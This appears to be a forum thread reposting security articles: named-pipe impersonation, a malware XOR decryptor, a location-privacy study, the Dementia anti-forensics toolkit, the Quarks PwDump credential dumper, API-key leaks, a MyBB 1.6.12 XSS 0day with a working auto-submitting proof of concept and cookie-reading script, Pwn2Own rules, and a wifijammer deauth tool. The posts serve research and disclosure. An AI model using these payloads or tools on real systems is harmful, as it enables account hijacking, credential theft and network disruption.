to the pipe client over what level of impersonation a server can perform. They are called the "Security Quality Of Service". There are 4 flags to define the impersonation level allowed. SECURITY_ANONYMOUS The server process cannot obtain identification information about the client, and it cannot impersonate the client. SECURITY_IDENTIFICATION The server process can obtain information about the client, such as security identifiers and privileges, but it cannot impersonate the client. ImpersonateNamedpipeClient will succeed, but no resources can be acquired while impersonating the client. The token can be opened and the information it contains can be read. SECURITY_IMPERSONATION - This is the default The server process can impersonate the client's security context on its local system. The server cannot impersonate the client on remote systems. SECURITY_DELEGATION The server process can impersonate the client's security context on remote systems. There are also 2 other flags: SECURITY_CONTEXT_TRACKING Specifies that any changes a client makes to its security context is reflected in a server that is impersonating it. If this option isn't specified, the server adopts the context of the client at the time of the impersonation and doesn't receive any changes. This option is honored only when the client and server process are on the same system. SECURITY_EFFECTIVE_ONLY Prevents a server from enabling or disabling a client's privilege or group while the server is impersonating. Note: Since the MSDN documentation for these flags is really weak, I used the definition that can be found in the book "Microsoft® Windows® Internals, Fourth Edition" by Mark Russinovich and David Solomon. Every time you create a pipe in client mode, you need to find out what the server needs to know about you and pass the right flags to CreateFile. And if you do, don't forget to also pass SECURITY_SQOS_PRESENT, otherwise the other flags will be ignored. Unfortunately, you don't have access to the source code of all the software running on your machine. I bet there are dozen of software running on my machine right now opening pipes without using the SQOS flags. To "fix" that, Microsoft implemented some restrictions about who a server can impersonate in order to minimize the chances of being exploited. A server can impersonate a client only if one of the following is true. The caller has the SeImpersonatePrivilege privilege. The requested impersonation level is SecurityIdentification or SecurityAnonymous. The identity of the client is the same as the server. The token of the client was created using LogonUser from inside the same logon session as the server. Only Administrators/System/SERVICES have the SeImpersonatePrivilege privilege. If the attacker is a member of these groups, you have much bigger problems. The requested impersonation level in our case is SecurityImpersonation, so the second point does not apply. That leaves us with the last two conditions. Should we worry about them? I think so. Here are some examples: I'm on XP. I want to run an untrusted application. Since I read my old posts, I know that I can run the process using a stripped down version of my token. Unfortunately, my restricted token has the same identity as the normal token. It can then try to exploit all applications running on my desktop. This is bad. My main account is not administrator on the machine. When I want to install software, I use RunAs. This brings up a new problem. RunAs uses LogonUser, and it is called from the same logon session! That means that my untrusted application using a restricted token derived from a standard user token can now try to exploit and impersonate a process running with administrator rights! This is worse. But how real is all this? This is hard to say. I don't have an idea about the percentage of applications using the SQOS flags. We must not forget that allowing impersonation is also required and desired in certain cases. For fun I took the first application using namedpipes that came to my mind: Windbg. There is an option in Windbg to do kernel debugging and if the OS you are debugging is inside vmware, you can specify the namedpipe corresponding the COM1 port of the vmware image. By default it is "com_1". My untrusted application running with the restricted token was now listening on com_1, and, easy enough, as soon as I started windbg, the untrusted application was able to steal its token. To be fair I have to say that vmware displayed an error message telling me that the com_1 port was "not configured as expected". I should not have started windbg knowing that. But, eh, who reads error messages? What should we do now? Well, it turns out that Microsoft implemented two new restrictions in windows Vista to fix these problems. I don't think they are documented yet. If the token of a server is restricted, it can impersonate only clients also running with a restricted token. The server cannot impersonate a client running at a higher integrity level. These new restrictions are fixing both my issues. First of all my untrusted application can't be running with a restricted token anymore. Then, even if the untrusted application is running with my standard token, it won't be able to impersonate the processes that I start with the "Run As Administrator" elevation prompt because they are running with a High Integrity Level. Now it is time to come back to the main question: Is it still an issue? My answer is yes. Windows XP is still the most popular Windows version out there and there is no sign that Vista is going to catch up soon. But I have to admit that I'm relieved to see the light at the end of the tunnel! -- Some technical details: When you call ImpersonateNamedPipeClient and none of the conditions is met, the function still succeeds, but the impersonation level of the token is SecurityIdentification. If you want to try for yourself, you can find the code to create a server pipe and a client pipe on my code page. Related link: Impersonation isn't dangerous by David Leblanc Posted by nsylvain at 4:54 PM Sursa: The Final Stream: Namedpipe Impersonation Attack
-
MRG Effitas automatic XOR decryptor tool Posted by Zoltan Balazs on February 1, 2014 in Latest | 0 comments Malware writers tend to protect their binaries and configuration files with XOR encryption. Luckily, they never heard about the one-time-pad requirement, which requires “never reuse the XOR key”. Binary files usually have long sequence of null bytes, which means the short XOR key (4 ascii characters in most of the cases) used by the malware writers can be spotted in the binary as a recurring pattern. This Python script (tested and developed on Python 3.3) can find these recurring patterns in the beginning of the XOR encrypted binary, calculate the correct “offset” of the key, use this XOR key to decrypt the encrypted file, and check the result for known strings. The tool was able to find the correct XOR key in 90% of the cases, in other cases fine-tuning the default parameters can help. We used this tool to decyrpt the XOR encrypted binaries found in network dumps. For example when exploit kits (e.g. Neutrino) were able to infect the victim, and the payload is delivered to the victim as a XOR encrypted binary. For a list of parameters, run # python auto_xor_decryptor.py -h The tool is released under GPLv3 licence. The script can be found on our Github account: https://github.com/MRGEffitas/scripts/blob/master/auto_xor_decryptor.py An example run of the tool looks like the following: c:\python33\python auto_xor_decryptor.py --input malware\48_.mp3 Auto XOR decryptor by MRG Effitas. Developed and tested on Python 3.3!This tool can automatically find short XOR keys in a XOR encrypted binary file, and use that to decrypt the XOR encrypted binary. Most parameters are good on default but if it is not working for you, you might try to fine-tune those. XOR key: b’626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b68626a6b6862? XOR key ascii: b’bjkh’ XOR key hex: b’626a6b68? Offset: 1 Final XOR key: b’jkhb’ Great success! input read from : malware\48_.mp3, output written to : decrypted MRG Effitas Team Sursa: Publishing of MRG Effitas automatic XOR decryptor tool | MRG Effitas
-
A Field Study of Run-Time Location Access Disclosures on Android Smartphones Huiqing Fu, Yulong Yang, Nileema Shingte, Janne Lindqvist, Marco Gruteser Rutgers University Please contact janne@winlab.rutgers.edu for any inquiries Abstract—Smartphone users are increasingly using apps that can access their location. Often these accesses can be without users knowledge and consent. For example, recent research has shown that installation-time capability disclosures are ineffective in informing people about their apps’ location access. In this paper, we present a four-week field study (N=22) on run-time location access disclosures. Towards this end, we implemented a novel method to disclose location accesses by location-enabled apps on participants’ smartphones. In particular, the method did not need any changes to participants’ phones beyond installing our study app. We randomly divided our participants to two groups: a Disclosure group (N=13), who received our disclosures and a No Disclosure group (N=9) who received no disclosures from us. Our results confirm that the Android platform’s location access disclosure method does not inform participants effectively. Almost all participants pointed out that their location was accessed by several apps they would have not expected to access their location. Further, several apps accessed their location more frequently than they expected. We conclude that our participants appreciated the transparency brought by our run-time disclosures and that because of the disclosures most of them had taken actions to manage their apps’ location access. Download: http://www.winlab.rutgers.edu/~janne/USECfieldstudy.pdf
-
[h=1]Dementia[/h]Dementia is a proof of concept memory anti-forensic toolkit designed for hiding various artifacts inside the memory dump during memory acquisition on Microsoft Windows operating system. By exploiting memory acquisition tools and hiding operating system artifacts (eg. processes, threads, etc.) from the analysis application, such as Volatility, Memoryze and others. Because of the flaws in some of the memory acquisition tools, Dementia can also hide operating system objects from the analysis tools completely from the user-mode. For further details about Dementia, check the 29c3 presentation (PDF or video below). Downloads Defeating Windows memory forensics.pdf Dementia-1.0-x64.zip Dementia-1.0.zip Sursa: https://code.google.com/p/dementia-forensics/
-
Quarks PwDump Mon 14 May 2012 By Sébastien Kaczmarek Quarks PwDump is new open source tool to dump various types of Windows credentials: local account, domain accounts, cached domain credentials and bitlocker. The tool is currently dedicated to work live on operating systems limiting the risk of undermining their integrity or stability. It requires administrator's privileges and is still in beta test. Quarks PwDump is a native Win32 open source tool to extract credentials from Windows operating systems. It currently extracts : Local accounts NT/LM hashes + history Domain accounts NT/LM hashes + history stored in NTDS.dit file Cached domain credentials Bitlocker recovery information (recovery passwords & key packages) stored in NTDS.dit JOHN and LC format are handled. Supported OS are Windows XP / 2003 / Vista / 7 / 2008 / 8 Why another pwdump-like dumper tool? No tools can actually dump all kind of hash and bitlocker information at the same time, a combination of tools is always needed. Libesedb (http://sourceforge.net/projects/libesedb/) library encounters some rare crashs when parsing different NTDS.dit files. It's safer to directly use Microsoft JET/ESE API to parse databases originally built with same functions. Bitlocker case has been added even if some specific Microsoft tools could be used to dump those information. (Active Directory addons or VBS scripts) The tool is currently dedicated to work live on operating systems limiting the risk of undermining their integrity or stability. It requires administrator's privileges. We plan to make it work full offline, for example on a disk image. How does it internally work? Case #1: Domain accounts hashes are extracted offline from NTDS.dit It's not currently full offline dump cause Quarks PwDump is dynamically linked with ESENT.dll (in charge of JET databases parsing) which differs between Windows versions. For example, it's not possible to parse Win 2008 NTDS.dit file from XP. In fact, record's checksum are computed in a different manner and database files appear corrupted for API functions. That's currently the main drawback of the tool, everything should be done on domain controller. However no code injection or service installation are made and it's possible to securely copy NTDS.dit file by the use of Microsoft VSS (Volume Shadow Copy Service). Case #2: Bitlocker information dump It's possible to retrieve interesting information from ActiveDirectory if some specific GPO have been applied by domain administrators (mainly "Turn on BitLocker backup to Active Directory" in group policy). Recovery password: it's a 48-digits passphrase which allow a user to mount its partition even if its password has been lost. This password can be used in Bitlocker recovery console. Key Package : it's a binary keyfile which allow an user to decipher data on a damaged disk or partition. It can be used with Microsoft tools, especially Bitlocker Repair Tool. For each entry found in NTDS.dit, Quarks PwDump show recovery password to STDOUT and keyfiles (key packages) are stored to separate files for each recovery GUID: {GUID_1}.pk, {GUID_2}.pk,... Volume GUID: an unique value for each BitLocker-encrypted volume. Recovery GUID: recovery password identifier, it could be the same for different encrypted volumes. Quarks PwDump does no retrieve TPM information yet. When ownership of the TPM is taken as part of turning on BitLocker, a hash of the ownership password can be taken and stored in AD directory service. This information can then be used to reset ownership of the TPM. This feature will be added in a further release. In an enterprise environment, those GPO should be often applied in order to ensure administrators can unlock a protected volume and employers can read specific files following an incident (intrusion or various malicious acts for example). Case #3: Local account and cached domain credentials There aren't something really new here, a lot of tools are already dumping them without any problems. However we have choosed an uncommmon way to dump them, only few tools use this technique. Hashes are extracted live from SAM and SECURITY hive in a proper way without code injection/service. In fact, we use native registry API, especially RegSaveKey() and RegLoadKey() functions which require SeBackup and SeRestore privileges. Next we mount SAM/REGISTRY hives on a different mount point and change all keys ACL in order to extend privileges to Administrator group and not LocalSystem only. That's why we choose to work on a backup to preserve system integrity. Writing this tool was not a really difficult challenge, windows hashes and bitlocker information storage methodology are mostly well documented. However it's an interesting project to understand strange Microsoft's implementation and choices for each kind of storage: High level obfuscation techniques are used for local and domain accounts hashes: many constants, atypical registry value name, useless ciphering layer, hidden constants stored in registry Class attribute,...However, it can be easily defeated. Used algorithms differ sometimes between windows version and global credentials storage approach isn't regular. We can find exhaustively: RC4, MD5, MD4, SHA-256, AES-256, AES-128 and DES. Bitlocker information are stored in cleartext in AD domain services. Project is still in beta test and we would really appreciate to have feedbacks or suggestions/comments about potential bugs. Binary and source code are available on GitHub (GNU GPL v3 license): Quarks PwDump v0.1b: https://github.com/quarkslab/quarkspwdump For NTDS parsing technical details, you can also refer to MISC MAG #59 article by Thibault Leveslin. Finally, we would like to greet NTDS hash dump (Csaba Barta), libesedb and creddump authors for their excellent work. Sursa: Quarks PwDump
-
Accidental API Key Exposure is a Major Problem This article, about how a security researcher managed to gain access to Prezi's source code by using credentials he found in a public BitBucket repo, became very popular recently. The author concludes his article by saying "Please be aware of what you put up on github/bitbucket." Accidentally posting API keys, as well as passwords and other sensitive information, on public source control repositories is a huge problem. It potentially allows anybody who comes across your code to access data, send communications, or even make purchases on your behalf. And yet API keys exposed in public GitHub repos is a common occurrence. As somebody who has accidentally posted private credentials on GitHub in the past myself, before quickly noticing and taking them down, I was interested to see how widespread the problem of inadvertently publishing private credentials is. I did a quick GitHub search for Twilio auth tokens and was alarmed at the results that were returned. (I had no reason in particular for choosing Twilio tokens over any other API tokens; I'm sure every major API provider is affected.) Combining that search with a simple Ruby script wrapping a regular expression, I was able to discover 187 Twilio auth tokens in a matter of minutes. One hundred and eighty seven. Sitting there waiting to be discovered by a GitHub search. And GitHub would only display the first 1000 results out of around 20,000. But this is just scratching the surface. When people realise that their API credentials are visible on a public repository, their first instinct is, as it should be, to remove them. But the problem is, removing the tokens and committing the result is not enough. While they will no longer appear in a GitHub code search, any sufficiently motivated person can scroll back through your repository's history on GitHub, and find your code containing your tokens, just as it was before you "removed" them. But, especially for side-projects or for casual GitHub users who might not yet fully understand the purpose or features of Git, this potential vulnerability may not be obvious - I have seen more than one person make the mistake of leaving API keys or passwords in their Git history. So what can we do about this? Replace sensitive information with placeholders If you aren't using Git for managing a project, and just want to throw it up on GitHub so you can share your code, the solution is simple: you can just remove your sensitive passwords from the code and replace them with an empty string or “<api key here>” or some other placeholder. But when you're actually using source control for managing your project, this solution starts to fall apart. You need another way of keeping your credentials out of your repository. Storing sensitive information outside of source control Some common methods of storing sensitive information that won't show up in your repository are: Environment variables - these have the added advantage of making it easy to have different API keys or passwords for different environments your application may be deployed on (like development, staging and production for a web app). Config files that are kept out of version control - these are typically JSON or YAML files that contain any sensitive information, like API keys or passwords, that should not be publicly available. Your application can then just import this file and access all of the information it needs. Depending on your programming language of choice, there may be a library available to help you with this. Depending on your programming language of choice, there may be some libraries available to help you with this, like nconf for Node.js, or any of these RubyGems. Removing sensitive information that's already in your repository As stated above, the history features of version control systems mean that simply removing the tokens and then committing the result is not enough. If you can, you might want to consider revoking the keys that have been made public, so that anybody who may have discovered them already will be prevented from using them. If not, your only option is to rewrite your entire commit history since the API keys were added. If you are using git, this is possible with the git-filter-branch command. GitHub has a good tutorial on it that details specifically the problem of removing sensitive data from a Git repository. Please be aware that this can cause problems if there are multiple collaborators on your project, as each collaborator will have to rebase their changes to be on top of yours. Accidental API key exposure is one of those problems that is easy to avoid as long as you keep it in mind from the beginning of a project, but once you've slipped up, it becomes very difficult to fix. By keeping the dangers in mind, and making sure you're always keeping your API keys, passwords, and any other sensitive information out of version control from the beginning, you're protecting yourself from a very real and very severe threat to the security of both you and your users. Sursa: Accidental API Key Exposure is a Major Problem | Ross Penman
-
MyBB 1.6.12 POST XSS 0day This is a weird bug I found in MyBB. I fuzzed the input of the search.php file. This was my input given. <foo> <h1> <script> alert (bar) () ; // ' " > < prompt \x41 %42 constructor onload MyBB throws out a SQL error: SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%<foo> <h1> <script> alert (bar) () ; //%' LOWER(t.subject) LIKE '%> < prompt \x41 \%42 constructor onload%') This made me analyze and reverse this to find the cause. After filtering out this was the correct input which can cause this error. This part should be constant or’(“\ To reproduce this issue you can add any char value in front on or’(“\ and 2 char values after or’(“\ and you cannot have any spaces in between them. This will be the skeleton: [1 char value]or’(“\[2 char values] Examples: 1or’(“\00 qor’(“\2a You can have a space like this qor’(“\ a SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%qor (%' LOWER(t.subject) LIKE '%\2a%') How to Inject JavaScript and HTML? We can inject HTML + JavaScript but the search.php filters out ‘ “ [] – characters. This is the method you could use inject your payload. If we put our constant in the middle we can inject our payload in front and after it. If we inject it at the beginning of the constant the payload will be stored in this manner. [B]<Payload here>[/B]qor’(“\2a SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%[B]<Payload Here>[/B]qor (%' LOWER(t.subject) LIKE '%\2a%') For example if we inject a HTML header at the beginning [B]<h1>Osanda</h1>[/B]qor’(“\2a It will look like this inside the source: SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%[B]<h1>Osanda</h1>[/B]qor (%' LOWER(t.subject) LIKE '%\2a%') Now if we try injecting at the end of our payload it will be stored in two places like this in the source. qor’(“\2a[B]<Payload Here>[/B] The payload is thrown out in the SQL error itself. 1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'LOWER(t.subject) LIKE '%\2a<payload here>%')' at line 3 The second place is inside the query. SELECT t.tid, t.firstpost FROM mybb_threads t WHERE 1=1 AND t.closed NOT LIKE 'moved|%' AND ( LOWER(t.subject) LIKE '%qor (%' LOWER(t.subject) LIKE '%\2a[B]<payload here>%[/B]') Example: This would be an example of JavaScript being interpreted <script>alert(/Osanda/)</script>. Notice that our string is converted to lower case characters due to the SQL query. Remember this filters out ‘ “ [] — characters. Therefore we can use and external script source for performing further client side attacks. Proof of Concept <html> <!-- Exploit-Title: MyBB 1.6.12 POST XSS 0day Google-Dork: inurl:index.php intext:Powered By MyBB Date: Februrary 2nd of 2014 Bug Discovered and Exploit Author: Osanda Malith Jayathissa Vendor Homepage: http://www.mybb.com Software Link: http://resources.mybb.com/downloads/mybb_1612.zip Version: 1.6.12 (older versions might be vulnerbale) Tested on: Windows 8 64-bit Original write-up: http://osandamalith.wordpress.com/2014/02/02/mybb-1-6-12-post-xss-0day --> <body> <form name="exploit" action="http://localhost/mybb_1612/Upload/search.php" method="POST"> <input type="hidden" name="action" value="do_search" /> <input type="hidden" name="keywords" value="qor'("\2a<script>alert(/XSS/)</script> " /> <script>document.exploit.submit(); </script> </form> </body> </html> POC Video You could do something creative like this in an external source to view the domain, cookies and exploitation beyond the filters. You can define your source like this. <script src=poc />qor'("\2a</script> This will be containing in the poc file. document.write('<h1>MyBB XSS 0day</h1><br/><h2>Domain: ' + document.domain + '</h2><br/> <h3> Osanda and HR</h3><strong>User Cookies: </strong><br/>' + document.cookie); alert('XSS by Osanda & HR'); Thanks to Hood3dRob1n for this idea I have no idea to inject SQL in this bug. You may give it a try and see. Sursa: MyBB 1.6.12 POST XSS 0day | Blog of Osanda Malith
-
- 1
-
-
Pwn2Own 2014: Rules and Unicorns Brian Gorenc, Manager, Vulnerability Research, HP Security Research HP’s Zero Day Initiative is once again expanding the scope of its annual Pwn2Own contest, with a new competition that combines multiple vulnerabilities for a challenge of unprecedented difficulty and reward. Last year we launched a plug-in track to the competition, in addition to our traditional browser targets. We’ll continue both tracks this year. For 2014, we’re introducing a complex Grand Prize challenge with multiple components, including a bypass of Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) protections – truly an Exploit Unicorn worthy of myth and legend, plus $150,000 to the researcher who can tame it (for additional background on this new category, see additional blog post here). Pwn2Own prize funds this year are expected to total over half a million dollars (USD) in cash and non-cash awards. As they did last year, our friends at Google are joining us in sponsoring all targets in the 2014 competition. Contest dates The contest will take place March 12-13 in Vancouver, British Columbia, at the CanSecWest 2014 conference. The schedule of contestants and platforms will be determined by random drawing at the conference venue and posted at Pwn2Own.com prior to the start of competition. Rules and prizes The 2014 competition consists of three divisions: Browsers, Plug-Ins, and the Grand Prize. All target machines will be running the latest fully patched versions of the relevant operating systems (Windows 8.1 x64 and OS X Mavericks), installed in their default configurations. The vulnerability or vulnerabilities used in each attack must be unknown and not previously reported to the vendor. A particular vulnerability can only be used once across all categories. The first contestant to successfully compromise a target within the 30-minute time limit wins the prize in that category. The 2014 targets are: Browsers: Google Chrome on Windows 8.1 x64: $100,000 Microsoft Internet Explorer 11 on Windows 8.1 x64: $100,000 Mozilla Firefox on Windows 8.1 x64: $50,000 Apple Safari on OS X Mavericks: $65,000 Plug-ins: Adobe Reader running in Internet Explorer 11 on Windows 8.1 x64: $75,000 Adobe Flash running in Internet Explorer 11 on Windows 8.1 x64: $75,000 Oracle Java running in Internet Explorer 11 on Windows 8.1 x64 (requires click-through bypass): $30,000 “Exploit Unicorn” Grand Prize: SYSTEM-level code execution on Windows 8.1 x64 on Internet Explorer 11 x64 with EMET (Enhanced Mitigation Experience Toolkit) bypass: $150,000* Please see the Pwn2Own 2014 rules for complete descriptions of the challenges. In particular, taming the Exploit Unicorn is a multi-step process, and competitors should be as familiar as possible with the necessary sequence of vulnerabilities required: The initial vulnerability utilized in the attack must be in the browser. The browser’s sandbox must be bypassed using a vulnerability in the sandbox. A separate privilege escalation vulnerability must be used to obtain SYSTEM-level arbitrary code execution on the target. The exploit must work when Microsoft’s Enhanced Mitigation Experience Toolkit (EMET) protections are enabled. In addition to the cash prizes listed above, successful competitors will receive the laptop on which they demonstrate the compromise. They’ll also receive 20,000 ZDI reward points, which immediately qualifies them for Silver standing in the benefits program. (ZDI Silver standing includes a one-time $5,000 cash payout, a 15% monetary bonus on all vulnerabilities submitted to ZDI during the next calendar year, a 25% reward-point bonus on all vulnerabilities submitted to ZDI over the next calendar year, and paid travel and registration to attend the 2014 DEFCON conference in Las Vegas.) As ever, vulnerabilities and exploit techniques revealed by contest winners will be disclosed to the affected vendors, and the proof of concept will become the property of HP in accordance with the HP ZDI program. If the affected vendors wish to coordinate an onsite transfer at the conference venue, HP ZDI is able to accommodate that request. The full set of rules for Pwn2Own 2014 is available here. They may be changed at any time without notice. Registration Pre-registration is required to ensure we have sufficient resources on hand in Vancouver. Please contact ZDI at zdi@hp.com to begin the registration process. (Email only, please; queries via Twitter, blog post, or other means will not be acknowledged or answered.) If we receive more than one registration for any category, we’ll hold a random drawing to determine contestant order. Registration closes at 5pm Pacific time on March 10, 2014. Follow the action Pwn2Own.com will be updated periodically with blogs, photos and videos between now and the competition, and in real time during the event. If it becomes necessary to hold a drawing to determine contestant order, we will also update the site in real time during that process. Follow us on Twitter at @thezdi, and keep an eye on the #pwn2own hashtag for more coverage. Press: Please direct all Pwn2Own or ZDI-related media inquiries to Cassy Lalan, hpesp@bm.com. (*Real-life unicorn prize subject to availability) Sursa: Pwn2Own 2014: Rules and Unicorns - PWN2OWN
-
[h=1]wifijammer[/h] Continuously jam all wifi clients and access points within range. The effectiveness of this script is constrained by your wireless card. Alfa cards seem to effectively jam within about a block's range with heavy access point saturation. Granularity is given in the options for more effective targeting. Requires: airmon-ng, python 2.7, python-scapy, a wireless card capable of injection [h=2]Usage[/h] [h=3]Simple[/h] python wifijammer.py This will find the most powerful wireless interface and turn on monitor mode. If a monitor mode interface is already up it will use the first one it finds instead. It will then start sequentially hopping channels 1 per second from channel 1 to 11 identifying all access points and clients connected to those access points. On the first pass through all the wireless channels it is only identifying targets. After that the 1sec per channel time limit is eliminated and channels are hopped as soon as the deauth packets finish sending. Note that it will still add clients and APs as it finds them after the first pass through. Upon hopping to a new channel it will identify targets that are on that channel and send 1 deauth packet to the client from the AP, 1 deauth to the AP from the client, and 1 deauth to the AP destined for the broadcast address to deauth all clients connected to the AP. Many APs ignore deauths to broadcast addresses. Sursa: https://github.com/DanMcInerney/wifijammer